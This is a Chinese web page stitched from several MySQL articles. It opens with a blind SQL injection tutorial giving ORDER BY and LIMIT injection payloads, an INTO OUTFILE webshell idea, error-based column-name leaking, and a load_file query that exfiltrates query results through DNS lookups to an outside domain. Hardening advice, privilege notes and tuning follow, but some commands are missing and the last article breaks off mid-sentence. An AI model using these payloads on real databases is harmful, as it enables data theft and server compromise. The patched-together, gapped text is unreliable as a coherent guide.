一、order by 的参数注入技巧：
两种方法，思路都一样。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常见的利用方法：

1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));

返回错误：[Err] 1242 – Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));

返回正常。

b.国外paper看到的方法：

1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;

返回错误：[Err] 1242 – Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;

返回正常。

二、limit 的参数注入技巧：

a.order by之后的limit参数 的注入，因为正常的sql语句order by后无法接union，所以没有好办法，就一个鸡肋思路：into outfile ‘/www/root/xxx.php’;

b.limit前无order by时的注入，那就方便多了，后面可以直接接union select ，随便怎么注都行了：

select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7

这里还有个技巧，使用procedure analyse可以获取字段名称：

select * from cdb_members where uid=1 limit 1,1 procedure analyse()

不过procedure analyse同样不能使用在order by之后：

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()

[Err] 1386 – Can’t use ORDER clause with this procedure

三、无法猜测字段时的技巧：

在mysql5以下版本或者information_schema 无法访问的时候，无法猜到某个表的字段名，于是可以采用这个办法，在子查询中使用%0，报错获得列名。以ucenter的uc_members为例。

1.猜测列数：

SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)

返回错误：#1241 – Operand should contain 12 column(s)

2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回正常。

3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误：#1048 – Column ‘uid’ cannot be null

4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误：#1048 – Column ‘username’ cannot be null
5. ……

注：5.1以上版本不适用，字段必须为非空（not null）

四、windows下利用dns解析盲注的技巧：

如果盲注很累，或者页面无论and 1=1还是and 1=2的时候返回都一模一样，这个时候利用dns进行注入是个不错的方法，前提是win环境root权限下的mysql，利用load_file函数读取远程文件的思路。本地搭建一个dns服务器，然后将特定域名的NS server转过来。然后进行注入，并抓包。

本地测试了下（实际注入中单引号可以编码）：

select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’))

抓包成功获得select的结果：

29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

如图所示：

相关文章

• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack
• MySql远程任意用户建接语句

1.快速的得到Mysql过去一段时间或者当前运行的状态
2.因硬件升级或者系统配置的改变而诊断对Mysql数据库性能影响
3.在Mysql数据库系统出现故障要能够及时收到告警
4.为日后编写运维报告提供各项数据指标供分析
5.……

想到了再做补充。而所有以上这些目的，通过各种方法和手段都可以做到。

自从Mysql数据库系统启动并且提供服务，Mysql内部自身的一套“计数器”就开始工作，可以通过
Show Global Status ， Show global variables ，Show full processlist
得到Mysql数据库系统当前各种系统变量和状态 ，并且后文介绍个各种监控工具几乎都是对这三个指令的输出
进行数据的计算和统计分析。

这里要提到的是mysqladmin这个Mysql自带的工具，除了用来做各种管理工作，还可以用来做监控
例如：每个10秒输出一次mysql的状态信息
#./mysqladmin -i 10 extended status

下面进入文章正题

一。GUI 类监控工具
1.MySQL administrator

Mysql公司发布管理工具，安装和使用都很方便
可以对Mysql 的状态，变量和进程监控，并且有简单图形绘制输出。

2.Cacti

用它来做系统监控的同仁相信很多，目前各种插件数量也很多，足以满足绝大多数公司监控要求。
这里要说的是Mysql监控插件teMySQL_cacti，能够对mysql做比较全面的监控，
但是我发现这个插件很长时间没有更新了。

3.Mysql-cacti-templates

Google cacti : http://code.google.com/p/mysql-cacti-templates/
这个应该说是teMySQL_cacti的升级和改进版本，项目发起人是主编《High Performance MySQL, Second Edition.》的作者
他的主页 http://www.xaprb.com/blog/
本人推荐使用，功能强大丰富。

4.Nagios
这个天天使用，没啥好说的，可以自己写监控脚本来监控，和cacti结合使用是不错的搭配！

5.Munin
Munin是一款和cacti类似的系统监控工具，有兴趣的可以去研究研究
http://munin.projects.linpro.no/，这里不多说

6.Zenoss
测试过一次，用的不多，不做什么评价

7.MySQL Enterprise Monitor
Mysql 旗舰付费产品，功能丰富

详细信息 http://www.mysql.com/products/enterprise/monitor.html
能够监控，报警，绘图，并提供性能优化和建议，集众多监控指标于一身，好是好，可以要花钱的哦
有兴趣的可以去download 30天的试用版本体验。

二。文字模式的监控工具
mysqlreport
http://hackmysql.com/mysqlreport

1.mytop
类似linux下top命令的输入
http://jeremy.zawodny.com/mysql/mytop/

2.mtstat-mysql
http://pypi.python.org/pypi/mtstat-mysql

3.mysqlreport
http://hackmysql.com/mysqlreport
看我写的这篇文章
用mysqlreport监控并输出mysql状态值  http://hackmysql.com/mysqlreportguide

4.innotop

这个针对innodb存储引擎数据库的监控，功能丰富
http://www.xaprb.com/blog/2006/07/02/innotop-mysql-innodb-monitor/

相关文章

• Mysql另类盲注中的一些技巧
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack
• MySql远程任意用户建接语句

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack
• MySql远程任意用户建接语句

解决办法：

1、打开php.ini。找到 upload_max_filesize 、 memory_limit 、 post_max_size 这三个参数！
(在默认的情况下,php只允许最大的上传数据为2M,也就是2048KB,而极限的最大使用内存memory_limit也仅为128M，Post的最大也为2M)

2、按您的服务器的实际性能配置进行如下改动：（注意：以下是按我的服务器性能和硬件配置进行的更改..）

upload_max_filesize = 8M (上传最大极限设定为8M,这个应该足够一般的文件WEB上传了)
memory_limit = 512M (因为服务器的内存为2GB,所以这里加到512M不过份吧，呵)
post_max_size = 8M (Post数据最大也设置为8MB,这个跟upload_max一样)

3、改完之后，我重新启动系统，再重新执行导入命令后：
Import has been successfully finished, 399 queries executed.
(显示导入成功,有多少个请求处理成功…)

（备注：改完后当你在到phpMyadmin的导入命令行时，虽然(有时候可能会仍然显示为:最大限制:2048KB/Max: 2,048KiB);但实际上你已经可以导入不超过8M的MySQL数据库.sql导出的备份文件了! 另，改完php.ini后，别忘了重启一下web服务或者是服务器哟！重启后升效!

相关文章

• Mysql另类盲注中的一些技巧
• 搞内网的一个小技巧
• MySQL监控快速指南
• 更改windows2003最大连接数
• 让千千静听不再弹出广告
• 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• MySQL安装详细图解
• wp-postviews和Wp Super Cache有冲突
• 流量过大，不得不启用WP Super Cache
• 让 Windows 开机自动拨号上网

MySQL是完全网络化的跨平台关系型数据库系统，同时是具有客户机/服务器体系结构的 分布式数据库管理系统。它具有功能强、使用简便、管理方便、运行速度快、安全可靠性强等优点，用户可利用许多语言编写访问MySQL数据库的程序，特别是 与PHP更是黄金组合，运用十分广泛。

由于MySQL是多平台的数据库，它的默认配置要考虑各种情况下都能适用，所以在我们自己的使用环境下应该进行进一步的安全加固。作为一个MySQL的系统管理员，我们有责任维护MySQL数据库系统的数据安全性和完整性。

MySQL数据库的安全配置必须从两个方面入手，系统内部安全和外部网络安全，另外我们还将简单介绍编程时要注意的一些问题以及一些小窍门。

2、系统内部安全

首先简单介绍一下MySQL数据库目录结构。MySQL安装好，运行了mysql_db_install脚本以后就会建立数据目录和初始化数据库。如果 我们用MySQL源码包安装，而且安装目录是/usr/local/mysql，那么数据目录一般会是/usr/local/mysql/var。数据库 系统由一系列数据库组成，每个数据库包含一系列数据库表。MySQL是用数据库名在数据目录建立建立一个数据库目录，各数据库表分别以数据库表名作为文件 名，扩展名分别为MYD、MYI、frm的三个文件放到数据库目录中。

MySQL的授权表给数据库的访问提供了灵活的权限控制，但是 如果本地用户拥有对库文件的读权限的话，攻击者只需把数据库目录打包拷走，然后拷到自己本机的数据目录下就能访问窃取的数据库。所以MySQL所在的主机 的安全性是最首要的问题，如果主机不安全，被攻击者控制，那么MySQL的安全性也无从谈起。其次就是数据目录和数据文件的安全性，也就是权限设置问题。

从MySQL主站一些老的binary发行版来看，3.21.xx版本中数据目录的属性是775，这样非常危险，任何本地用户都可以读数据目录，所以数 据库文件很不安全。3.22.xx版本中数据目录的属性是770，这种属性也有些危险，本地的同组用户既能读也能写，所以数据文件也不安全。 3.23.xx版本数据目录的属性是700，这样就比较好，只有启动数据库的用户可以读写数据库文件，保证了本地数据文件的安全。

如果启动MySQL数据库的用户是mysql，那么象如下的目录和文件的是安全的，请注意数据目录及下面的属性：

如果这些文件的属主及属性不是这样，请用以下两个命令修正之：

用root用户启动远程服务一直是安全大忌，因为如果服务程序出现问题，远程攻击者极有可能获得主机的完全控制权。MySQL从3.23.15版本开始 时作了小小的改动，默认安装后服务要用mysql用户来启动，不允许root用户启动。如果非要用root用户来启动，必须加上--user=root的 参数

因为MySQL中有LOAD DATA INFILE和SELECT ... INTO OUTFILE的SQL语句，如果是root用户启动了MySQL服务器，那么，数据库用户就拥有了root用户的写权限。不过MySQL还是做了一些限 制的，比如LOAD DATA INFILE只能读全局可读的文件，SELECT ... INTO OUTFILE不能覆盖已经存在的文件。

本地的日志文件也不能忽视，包括shell的日志和MySQL自己的日志。有些用户在本地登陆或备份数据库的时候为了图方便，有时会在命令行参数里直接带了数据库的密码，如：

这些命令会被shell记录在历史文件里，比如bash会写入用户目录的.bash_history文件，如果这些文件不慎被读，那么数据库的密码就会 泄漏。用户登陆数据库后执行的SQL命令也会被MySQL记录在用户目录的.mysql_history文件里。如果数据库用户用SQL语句修改了数据库 密码，也会因.mysql_history文件而泄漏。所以我们在shell登陆及备份的时候不要在-p后直接加密码，而是在提示后再输入数据库密码。

另外这两个文件我们也应该不让它记录我们的操作，以防万一。

上门这两条命令把这两个文件链接到/dev/null，那么我们的操作就不会被记录到这两个文件里了。

3、外部网络安全

MySQL数据库安装好以后，Unix平台的user表是这样的：

图1

4 rows in set (0.00 sec)

Windows平台的user表是这样的：

图2

4 rows in set (0.00 sec)

我们先来看Unix平台的user表。其中redhat只是我试验机的机器名，所以实际上Unix平台的MySQL默认只允许本机才能连接数据库。但是缺省root用户口令是空，所以当务之急是给root用户加上口令。给数据库用户加口令有三种方法：

1)在shell提示符下用mysqladmin命令来改root用户口令:

这样，MySQL数据库root用户的口令就被改成test了。(test只是举例，我们实际使用的口令一定不能使用这种易猜的弱口令)

2)用set password修改口令

这时root用户的口令就被改成test了。

3)直接修改user表的root用户口令：

这样，MySQL数据库root用户的口令也被改成test了。其中最后一句命令flush privileges的意思是强制刷新内存授权表，否则用的还是缓冲中的口令，这时非法用户还可以用root用户及空口令登陆，直到重启MySQL服务器。

我们还看到user为空的匿名用户，虽然它在Unix平台下没什么权限，但为了安全起见我们应该删除它：

Windows版本MySQL的user表有很大不同，我们看到Host字段除了localhost还有是%。这里%的意思是允许任意的主机连接MySQL服务器，这是非常不安全的，给攻击者造成可乘之机，我们必须删除Host字段为%的记录：

默认root用户的空密码也是必须修改，三种修改方法和Unix平台一样。

我们注意到Host字段为localhost的匿名用户拥有所有的权限!就是说本地用户用空的用户名和空的口令登陆MySQL数据库服务器可以得到最高的权限!所以匿名用户必须删除!

对user表操作以后不要忘了用flush privileges来强制刷新内存授权表，这样才能生效。

默认安装的Windows版MySQL存在的不安全因素太多，我们在安装后一定要进一步配置!

MySQL的5个授权表：user, db, host, tables_priv和columns_priv提供非常灵活的安全机制，从MySQL 3.22.11开始引入了两条语句GRANT和REVOKE来创建和删除用户权限，可以方便的限制哪个用户可以连接服务器，从哪里连接以及连接后可以做什 么操作。作为MySQL管理员，我们必须了解授权表的意义以及如何用GRANT和REVOKE来创建用户、授权和撤权、删除用户。

在3.22.11版本以前的MySQL授权机制不完善，和新版本也有较大的不同，建议升级到最新版本的MySQL。(本书的操作例子是以MySQL 3.23.49为样本)我们先来了解授权表的结构。

1)MySQL授权表的结构与内容：

图3

17 rows in set (0.01 sec)

user表是5个授权表中最重要的一个，列出可以连接服务器的用户及其加密口令，并且它指定他们有哪种全局(超级用户)权限。在user表启用的任何权限均是全局权限，并适用于所有数据库。所以我们不能给任何用户访问mysql.user表的权限!

权限说明：

图4

图5

13 rows in set (0.01 sec)

db表列出数据库，而用户有权限访问它们。在这里指定的权限适用于一个数据库中的所有表。

图6

12 rows in set (0.01 sec)

host表与db表结合使用在一个较好层次上控制特定主机对数据库的访问权限，这可能比单独使用db好些。这个表不受GRANT和REVOKE语句的影响，所以，你可能发觉你根本不是用它。

图7

8 rows in set (0.01 sec)

tables_priv表指定表级权限。在这里指定的一个权限适用于一个表的所有列。

图8

7 rows in set (0.00 sec)

columns_priv表指定列级权限。在这里指定的权限适用于一个表的特定列。

2)MySQL授权表运行机制

MySQL的访问控制分两个步骤：

a)服务器检查是否允许该用户连接。

b)如果该用户有权连接，那么服务器还会检查它的每一个请求是否有足够的权限。比如：用户检索数据库中的一个表需要有这个数据库的select权限，用户删除数据库中的一个表需要有这个数据库的drop权限。

授权表的user, db,host表使用这两个步骤，tables_priv和columns_priv表只使用第二步(检查请求)。每个授权表包含决定一个权限何时运用的范围列和决定授予哪种权限的权限列。

范围列指定表中的权限何时运用。每个授权表条目包含User和Host列来指定权限何时运用于一个给定用户从给定主机的连接。其他表包含附加的范围列， 如db表包含一个Db列指出权限运用于哪个数据库。类似地，tables_priv和columns_priv表包含范围字段，缩小范围到一个数据库中的 特定表或一个表的特定列。

下面是user表的Host字段和User字段组合的一些例子：

图9

SQL的字符串通配符%表示匹配任意字符，可以是0个字符，通配符_表示匹配一个字符。

权限列指出在范围列中指定的用户拥有何种权限。该表使用GRANT语句的权限名称。对于绝大多数在user、db和host表中的权限列的名称与GRANT语句中有明显的联系。如Select_priv对应于SELECT权限。

3)授权表使用举例

grant用于给增加用户和创建权限，revoke用于删除用户权限。

下面是一些用grant增加用户和创建权限的例子：

这句增加一个本地具有所有权限的test用户(超级用户)，密码是test。ON子句中的*.*意味着"所有数据库、所有表"。with grant option表示它具有grant权限。

这句是增加了一个test1用户，口令是test，但是它只能从C类子网192.168.1连接，对test库有select,insert,update,delete,create,drop操作权限。

用grant语句创建权限是不需要再手工刷新授权表的，因为它已经自动刷新了。

给用户创建权限还可以通过直接修改授权表：

这两句和上面第一句grant的效果是一样的，也是增加了一个本地的test超级用户。我们看到用grant方便多了，而且还不需flush privileges。

这三句和上面第二句grant的效果也是一样的，也是增加了一个只 能从C类子网192.168.1连接，对test库有select,insert,update,delete,create,drop操作权限的 test1用户，口令是test。要取消一个用户的权限，使用revoke语句。revoke的语法非常类似于grant语句，除了to用from取代并 且没有identified by和with grant option子句，下面是用revoke删除用户权限的例子：

这句revoke就撤消了上面第二句grant创建的权限，但是test1用户并没有被删除，必须手工从user表删除：

这样，test1用户就彻底删除了。

这些只是MySQL授权表的简单使用，更多详细的资料请见MySQL提供的手册。

4、编程需要注意的一些问题

不管是用哪种程序语言写连接MySQL数据库的程序，有一条准则是永远不要相信用户提交的数据!

对于数字字段，我们要使用查询语句：SELECT * FROM table WHERE ID='234'，不要使用SELECT * FROM table WHERE ID=234这样的查询语句。MySQL会自动把字串转换为数字字符并且去除非数字字符。如果用户提交的数据经过了 mysql_escape_string处理，这样我们就可以完全杜绝了sql inject攻击。

各种编程语言该注意的问题：

1)所有Web程序：

a)尝试在Web表单输入单引号和双引号来测试可能出现的错误，并找出原因所在。

b)修改URL参数带的%22 ('"'), %23 ('#'), 和 %27 (''')。

c)对于数字字段的变量，我们的应用程序必须进行严格的检查，否则是非常危险的。

d)检查用户提交的数据是否超过字段的长度。

e)不要给自己程序连接数据库的用户过多的访问权限。

2)PHP：

a)检查用户提交的数据在查询之前是否经过addslashes处理，在PHP 4.0.3以后提供了基于MySQL C

API的函数mysql_escape_string()。

3)MySQL C API：

a)检查查询字串是否用了mysql_escape_string() API调用。

4)MySQL++：

a)检查查询字串是否用了escape和quote处理。

5)Perl DBI：

a)检查查询字串是否用了quote()方法。

6)Java JDBC：

a)检查查询字串是否用了PreparedStatement对象。

5、一些小窍门

1)如果不慎忘记了MySQL的root密码，我们可以在启动MySQL服务器时加上参数--skip-grant-tables来跳过授权表的验证 (./safe_mysqld --skip-grant-tables &)，这样我们就可以直接登陆MySQL服务器，然后再修改root用户的口令，重启MySQL就可以用新口令登陆了。

2)启动MySQL服务器时加上--skip-show-database使一般数据库用户不能浏览其它数据库。

3)启动MySQL服务器时加上--chroot=path参数，让mysqld守护进程运行在chroot环境中。这样SQL语句LOAD DATA INFILE和SELECT ... INTO OUTFILE就限定在chroot_path下读写文件了。这里有一点要注意，MySQL启动后会建立一个mysql.sock文件，默认是在/tmp 目录下。使用了chroot后，MySQL会在chroot_path/tmp去建立mysql.sock文件，如果没有chroot_path/tmp 目录或启动MySQL的用户没有这个目录写权限就不能建立mysql.sock文件，MySQL会启动失败。比如我们加了--chroot=/usr /local/mysql/启动参数，那么最好建立一个启动MySQL的用户能写的/usr/local/mysql/tmp目录，当然我们也可以用 --socket=path来指定mysql.sock文件的路径，但这个path一定要在chroot_path里面。

4)启动 MySQL服务器时加上--log-slow-queries[=file]参数，这样mysqld会把SQL命令执行时间超过 long_query_time的写入file文件。如果没有指定=file，mysqld默认会写到数据目录下的hostname-slow.log。 如果只指定了filename，没有指定路径，那么mysqld也会把filename写到数据目录下。我们通过这个日志文件可以找出执行时间超长的查询 语句，然后尽可能的优化它减轻MySQL服务器的负担。

5)如果我们只需本机使用MySQL服务，那么我们还可以加上--skip-networking启动参数使MySQL不监听任何TCP/IP连接，增加安全性。(非常推荐)

6)MySQL的更多mysqld启动选项请见MySQL手册4.16.4 mysqld Command-line Options

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack
• MySql远程任意用户建接语句

一．权限表
mysql数据库中的3个权限表：user 、db、 host
权限表的存取过程是：
1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中，存在则通过身份验证；
2)通过权限验证，进行权限分配时，按照userdbtables_privcolumns_priv的顺序进行分配。即先检查全局权限表 user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，并得到db中为Y的权限；如果db中为N，则检 查tables_priv中此数据库对应的具体表，取得表中的权限Y，以此类推。
二．MySQL各种权限（共27个）
（以下操作都是以root身份登陆进行grant授权，以p1@localhost身份登陆执行各种命令。）

1. usage
连接（登陆）权限，建立一个用户，就会自动授予其usage权限（默认授予）。
mysql> grant usage on *.* to ‘p1′@’localhost’ identified by ‘123′;
该权限只能用于数据库登陆，不能执行任何操作；且usage权限不能被回收，也即REVOKE用户并不能删除用户。
2. select
必须有select的权限，才可以使用select table
mysql> grant select on pyt.* to ‘p1′@’localhost’;
mysql> select * from shop;
3. create
必须有create的权限，才可以使用create table
mysql> grant create on pyt.* to ‘p1′@’localhost’;
4. create routine
必须具有create routine的权限，才可以使用{create |alter|drop} {procedure|function}
mysql> grant create routine on pyt.* to ‘p1′@’localhost’;
当授予create routine时，自动授予EXECUTE, ALTER ROUTINE权限给它的创建者：
mysql> show grants for ‘p1′@’localhost’;
+—————————————————————————+
Grants for p1@localhost
+————————————————————————–+
| GRANT USAGE ON *.* TO ‘p1′@’localhost’ IDENTIFIED BY PASSWORD ‘*23AE809DDACAF96AF0FD78ED04B6A265E05AA257′ |
| GRANT SELECT, CREATE, CREATE ROUTINE ON `pyt`.* TO ‘p1′@’localhost’|
| GRANT EXECUTE, ALTER ROUTINE ON PROCEDURE `pyt`.`pro_shop1` TO ‘p1′@’localhost’ |
+————————————————————————————-+
5. create temporary tables(注意这里是tables，不是table)
必须有create temporary tables的权限，才可以使用create temporary tables.
mysql> grant create temporary tables on pyt.* to ‘p1′@’localhost’;
[mysql@mydev ~]$ mysql -h localhost -u p1 -p pyt
mysql> create temporary table tt1(id int);
6. create view
必须有create view的权限，才可以使用create view
mysql> grant create view on pyt.* to ‘p1′@’localhost’;
mysql> create view v_shop as select price from shop;
7. create user
要使用CREATE USER，必须拥有mysql数据库的全局CREATE USER权限，或拥有INSERT权限。
mysql> grant create user on *.* to ‘p1′@’localhost’;
或：mysql> grant insert on *.* to p1@localhost;
8. insert
必须有insert的权限，才可以使用insert into ….. values….
9. alter
必须有alter的权限，才可以使用alter table
alter table shop modify dealer char(15);
10. alter routine
必须具有alter routine的权限，才可以使用{alter |drop} {procedure|function}
mysql>grant alter routine on pyt.* to ‘p1′@’ localhost ‘;
mysql> drop procedure pro_shop;
Query OK, 0 rows affected (0.00 sec)

mysql> revoke alter routine on pyt.* from ‘p1′@’localhost’;
[mysql@mydev ~]$ mysql -h localhost -u p1 -p pyt
mysql> drop procedure pro_shop;
ERROR 1370 (42000): alter routine command denied to user ‘p1′@’localhost’ for routine ‘pyt.pro_shop’
11. update
必须有update的权限，才可以使用update table
mysql> update shop set price=3.5 where article=0001 and dealer=’A’;
12. delete
必须有delete的权限，才可以使用delete from ….where….(删除表中的记录)
13. drop
必须有drop的权限，才可以使用drop database db_name; drop table tab_name;
drop view vi_name; drop index in_name;
14. show database
通过show database只能看到你拥有的某些权限的数据库，除非你拥有全局SHOW DATABASES权限。
对于p1@localhost用户来说，没有对mysql数据库的权限，所以以此身份登陆查询时，无法看到mysql数据库：
mysql> show databases;
+——————–+
| Database |
+——————–+
| information_schema|
| pyt |
| test |
+——————–+
15. show view
必须拥有show view权限，才能执行show create view。
mysql> grant show view on pyt.* to p1@localhost;
mysql> show create view v_shop;
16. index
必须拥有index权限，才能执行[create |drop] index
mysql> grant index on pyt.* to p1@localhost;
mysql> create index ix_shop on shop(article);
mysql> drop index ix_shop on shop;
17. excute
执行存在的Functions,Procedures
mysql> call pro_shop1(0001,@a)；
+———+
| article |
+———+
| 0001 |
| 0001 |
+———+
mysql> select @a;
+——+
| @a |
+——+
| 2 |
+——+
18. lock tables
必须拥有lock tables权限，才可以使用lock tables
mysql> grant lock tables on pyt.* to p1@localhost;
mysql> lock tables a1 read;
mysql> unlock tables;
19. references
有了REFERENCES权限，用户就可以将其它表的一个字段作为某一个表的外键约束。
20. reload
必须拥有reload权限，才可以执行flush [tables | logs | privileges]
mysql> grant reload on pyt.* to p1@localhost;
ERROR 1221 (HY000): Incorrect usage of DB GRANT and GLOBAL PRIVILEGES
mysql> grant reload on *.* to ‘p1′@’localhost’;
Query OK, 0 rows affected (0.00 sec)
mysql> flush tables;
21. replication client
拥有此权限可以查询master server、slave server状态。
mysql> show master status;
ERROR 1227 (42000): Access denied; you need the SUPER,REPLICATION CLIENT privilege for this operation
mysql> grant Replication client on *.* to p1@localhost;
或：mysql> grant super on *.* to p1@localhost;
mysql> show master status;
+——————+———-+————–+——————+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |
+——————+———-+————–+——————+
| mysql-bin.000006 | 2111 | | |
+——————+———-+————–+——————+
mysql> show slave status;
22. replication slave
拥有此权限可以查看从服务器，从主服务器读取二进制日志。
mysql> show slave hosts;
ERROR 1227 (42000): Access denied; you need the REPLICATION SLAVE privilege for this operation
mysql> show binlog events;
ERROR 1227 (42000): Access denied; you need the REPLICATION SLAVE privilege for this operation
mysql> grant replication slave on *.* to p1@localhost;
mysql> show slave hosts;
Empty set (0.00 sec)
mysql>show binlog events;
+—————+——-+—————-+———–+————-+————–+
| Log_name | Pos | Event_type | Server_id| End_log_pos|Info | +—————+——-+————–+———–+————-+—————+
| mysql-bin.000005 | 4 | Format_desc | 1 | 98 | Server ver: 5.0.77-log, Binlog ver: 4 | |mysql-bin.000005|98|Query|1|197|use `mysql`; create table a1(i int)engine=myisam|
……………………………………
23. Shutdown
关闭MySQL：
[mysql@mydev ~]$ mysqladmin shutdown
重新连接：
[mysql@mydev ~]$ mysql
ERROR 2002 (HY000): Can’t connect to local MySQL server through socket ‘/tmp/mysql.sock’ (2)
[mysql@mydev ~]$ cd /u01/mysql/bin
[mysql@mydev bin]$ ./mysqld_safe &
[mysql@mydev bin]$ mysql
24. grant option
拥有grant option，就可以将自己拥有的权限授予其他用户（仅限于自己已经拥有的权限）
mysql> grant Grant option on pyt.* to p1@localhost;
mysql> grant select on pyt.* to p2@localhost;
25. file
拥有file权限才可以执行 select ..into outfile和load data infile…操作，但是不要把file, process, super权限授予管理员以外的账号，这样存在严重的安全隐患。
mysql> grant file on *.* to p1@localhost;
mysql> load data infile ‘/home/mysql/pet.txt’ into table pet;
26. super
这个权限允许用户终止任何查询；修改全局变量的SET语句；使用CHANGE MASTER，PURGE MASTER LOGS。
mysql> grant super on *.* to p1@localhost;
mysql> purge master logs before ‘mysql-bin.000006′;
27. process
通过这个权限，用户可以执行SHOW PROCESSLIST和KILL命令。默认情况下，每个用户都可以执行SHOW PROCESSLIST命令，但是只能查询本用户的进程。
mysql> show processlist;
+—-+——+———–+——+———+——+——-+——————+
| Id | User | Host | db | Command | Time | State | Info |
+—-+——+———–+——+———+——+——-+——————+
| 12 | p1 | localhost | pyt | Query | 0 | NULL | show processlist |
+—-+——+———–+——+———+——+——-+——————+
另外，
管理权限（如 super， process， file等）不能够指定某个数据库，on后面必须跟*.*
mysql> grant super on pyt.* to p1@localhost;
ERROR 1221 (HY000): Incorrect usage of DB GRANT and GLOBAL PRIVILEGES
mysql> grant super on *.* to p1@localhost;
Query OK, 0 rows affected (0.01 sec)

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• SQL Server系统表的作用 安全检查列表 SQL Server的用户及权限
• MySQL数据库安全配置指南
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• 关于Windows的权限和一些安全问题
• MySQLhack

作/译者：叶金荣，来源：http://imysql.cn，转载请注明作/译者和出处，并且不能用于商业用途，违者必究。

一. 前言
近日由于需要,对discuz论坛(简称dz)进行优化,当然了,只是涉及到数据库的优化.
先说一下服务器及dz的数据量,2 * Intel(R) Xeon(TM) CPU 2.40GHz, 4GB mem, SCISC硬盘.
MySQL 版本为 4.0.23. 数据表情况:
cdb_attachments 2万
cdb_members 10万
cdb_posts 68万
cdb_threads 7万
二. 缓存优化
在 my.cnf 中添加/修改以下选项:

 #取消文件系统的外部锁
skip-locking
#不进行域名反解析,注意由此带来的权限/授权问题
skip-name-resolve
#索引缓存,根据内存大小而定,如果是独立的db服务器,可以设置高达80%的内存总量
key_buffer = 512M
#连接排队列表总数
back_log = 200
max_allowed_packet = 2M
#打开表缓存总数,可以避免频繁的打开数据表产生的开销
table_cache = 512
#每个线程排序所需的缓冲
sort_buffer_size = 4M
#每个线程读取索引所需的缓冲
read_buffer_size = 4M
#MyISAM表发生变化时重新排序所需的缓冲
myisam_sort_buffer_size = 64M
#缓存可重用的线程数
thread_cache = 128
#查询结果缓存
query_cache_size = 128M
#设置超时时间,能避免长连接
set-variable = wait_timeout=60
#最大并发线程数,cpu数量*2
thread_concurrency = 4
#记录慢查询,然后对慢查询一一优化
log-slow-queries = slow.log
long_query_time = 1
#关闭不需要的表类型,如果你需要,就不要加上这个
skip-bdb

以上参数根据各自服务器的配置差异进行调整,仅作为参考.
三. 索引优化
上面提到了,已经开启了慢查询,那么接下来就要对慢查询进行逐个优化了.
1. 搜索优化
搜索的查询SQL大致如下:

 SELECT t.* FROM cdb_posts p, cdb_threads t WHERE
t.fid IN ('37', '45', '4', '6', '17', '41', '28', '32', '31', '1', '42')
AND p.tid=t.tid AND p.author LIKE 'JoansWin'
GROUP BY t.tid ORDER BY lastpost DESC LIMIT 0, 80;

用 EXPLAIN 分析的结果如下:

 mysql>EXPLAIN  SELECT t.* FROM cdb_posts p, cdb_threads t WHERE
t.fid IN ('37', '45', '4', '6', '17', '41', '28', '32', '31', '1', '42')
AND p.tid=t.tid AND p.author LIKE 'JoansWin'
GROUP BY t.tid ORDER BY lastpost DESC LIMIT 0, 80;
+-----------+------------+----------+--------------+-------------+-----------+-------------+
| id | select_type | table | type  | possible_keys | key  | key_len | ref         | rows  | Extra
+-----------+------------+----------+--------------+-------------+-----------+-------------+
|  1 | SIMPLE      | t     | range | PRIMARY,fid   | fid  | 2       | NULL        | 66160 | Using where;
Using temporary; Using filesort |
|  1 | SIMPLE      | p     | ref   | tid           | tid  | 3       | Forum.t.tid   |    10 | Using where
| +----+-------------+-------+-------+---------------+------+---------+-------------+-------+
---------

只用到了 t.fid 和 p.tid,而 p.author 则没有索引可用,总共需要扫描
